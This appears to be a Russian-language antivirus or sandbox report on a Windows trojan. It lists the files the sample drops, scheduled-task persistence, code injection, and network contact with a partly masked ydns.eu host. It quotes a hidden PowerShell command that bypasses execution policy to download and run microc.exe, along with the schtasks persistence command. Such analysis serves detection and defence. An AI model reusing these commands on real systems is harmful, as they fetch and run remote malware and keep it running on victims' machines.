Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\updates\aqybwlpahqfm
Вредоносные функции
Загружает и запускает на исполнение
- http://le#######kokkiskikinew.ydns.eu/microc.exe как %appdata%\microc.exe
Внедряет код в
следующие пользовательские процессы:
- microc.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abdtfhghgdghghВќ.sct
- %APPDATA%\microc.exe
- %APPDATA%\aqybwlpahqfm.exe
- %TEMP%\tmpfc19.tmp
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\aqybwlpahqfm.exe
Удаляет следующие файлы
- %TEMP%\abdtfhghgdghghВќ.sct
- %TEMP%\tmpfc19.tmp
Сетевая активность
Подключается к
- 'le#######kokkiskikinew.ydns.eu':80
TCP
Запросы HTTP GET
- http://le#######kokkiskikinew.ydns.eu/microC.exe
UDP
- DNS ASK le#######kokkiskikinew.ydns.eu
Другое
Создает и запускает на исполнение
- '%APPDATA%\microc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://le#######kokkiskikinew.ydns.eu/microC.exe','%APPDATA%\microC.exe');Sta...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\AqybWLPaHQfm" /XML "%TEMP%\tmpFC19.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\AqybWLPaHQfm" /XML "%TEMP%\tmpFC19.tmp"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\dw20.exe' -x -s 388
